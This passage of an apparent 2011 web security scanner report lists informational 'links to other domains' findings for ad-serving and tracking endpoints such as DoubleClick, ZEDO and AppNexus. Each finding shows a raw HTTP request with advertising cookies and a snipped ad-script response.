Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=51&b=50020&cid=633862074462683028"> <\/script>
...[SNIP]...

17.18. http://finance.fox8live.com/inergize.wvue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /inergize.wvue?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40681

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
'head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);

var tcdacmd="dt";
document.write('<script src="http://an.tacoda.net/an/18181/slf.js"></script>
...[SNIP]...

17.19. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 09 May 2011 15:35:38 GMT
Expires: Mon, 09 May 2011 15:35:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Groupon" c/o "Groupon", segment: 'Subscription Landing Page' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment" width="1" height="1" />
<!-- End of pixel tag --><img src="http://idcs.interclick.com/Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea"/><img src="http://pixel.quantserve.com/pixel/p-f5C1tdAD-3ZQ-.gif?labels=_fp.event.Sub+LP" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44553;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt="">
...[SNIP]...
<!-- Advertiser 'Groupon', Include user in segment 'Groupon Remarketing Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1020641&t=2" width="1" height="1" />
<!-- End of segment tag --><img src="http://at.amgdgt.com/ads/?t=pp&px=13933&rnd=[cachebuster]" width="1" height="1" border="0"/>
<img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44556;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt="">
...[SNIP]...
<img
src="http://ad.doubleclick.net/activity;src=2895566;dcnet=6457;boom=44554;sz=1x1;ord=429162006?"
width="1" height="1" border="0" alt=""><img height="1" width="1" src="http://tags.bluekai.com/site/3869"></body>
...[SNIP]...

17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_Top728x90;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413986;noperf=1;size=728x90;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 942

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_Spon1;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413985;noperf=1;size=88x31;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 319

document.write('<a href="http://gannett.gcion.com/?adlink/5111/778079/0/13/AdId=-3;BnId=0;itime=955413808;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/usga13_88x31.gif" border=0 alt="gannett.com" width="88" height="31"></a>
...[SNIP]...

17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=www.usatoday.com/weather/floods_FixedPanel;cookie=info;loc=100;target=_blank;grp=95308;misc=1304955413987;noperf=1;size=336x700;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;kvtitle=Levee-blasted-along-Mississippi-River-to-spare-Cairo-Ill---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; JEB2=4DC7E58B6E651A440C6EAF39F000181A; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 324

document.write('<a href="http://gannett.gcion.com/?adlink/5111/1126918/0/2555/AdId=-3;BnId=0;itime=955415450;key=Levee+blasted+along+Mississippi+River+spare+Cairo+Ill+USATODAYcom;" target=_blank><img src="http://aka-cdn-ns.adtechus.com/images/AT2555_336x700.gif" border=0 alt="AdTech Ad" width="336" height="700"></a>
...[SNIP]...

17.23. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 09 May 2011 15:37:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5101

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CP3Pgoj_hfrXvQEQrAIY-gEyCFMXXH_f_4KP">
...[SNIP]...
54105195%2526ccsurl%253D%2524%2524http://www.fedex.com/us/office/marketing/signsbanners/index.html%253FHBX_CMP%253DKNC-REM297%2526HBX_PK%253Dsmall%252520business%252520marketing%252520ideas%2524%2524"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CP3Pgoj_hfrXvQEQrAIY-gEyCFMXXH_f_4KP" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB3ytHQwrITbnTGsK0sQfI-p2oD4Oo6ZkC84XZxBzAjbcBgMLeAxABGAEggqrzDjgAUMe1jrT______wFgyYaFiYikhBCyARN3d3cudGhlcmVwdWJsaWMuY29tugEKMzAweDI1MF9hc8gBBNoBIGh0dHA6Ly93d3cudGhlcmVwdWJsaWMuY29tL2hvbWUv4AECuAIYyAKLlosbqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ%26num%3D1%26sig%3DAGiWqtyE-9bnbWsG0dSOOWYYyQWe3_HLqQ%26client%3Dca-pub-8560941387472259%26adurl%3Dhttp://bs.serving-sys.com/BurstingPipe/AdServer.bs%253Fcn%253Dccs%2526ebcmp%253D10041837%2526ebkw%253D21777157%2526advid%253D30544%2526ebag%253D471087%2526sead%253D7554105195%2526ccsurl%253D%2524%2524http://www.fedex.com/us/office/marketing/signsbanners/index.html%253FHBX_CMP%253DKNC-REM297%2526HBX_PK%253Dsmall%252520business%252520marketing%252520ideas%2524%2524" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.therepublic.com/home/%26hl%3Den%26client%3Dca-pub-8560941387472259%26adU%3Dfedex.com/banners%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNESFKZ5ah0h73AmAujdy-pKKJu5xQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

17.24. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...
</scr'+'ipt>');document.write('<script type="text/javascript" src="http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=2724386019227846218"></script>
...[SNIP]...

17.25. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-65201734_1304955420,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-65201734_1304955420%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D637150%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
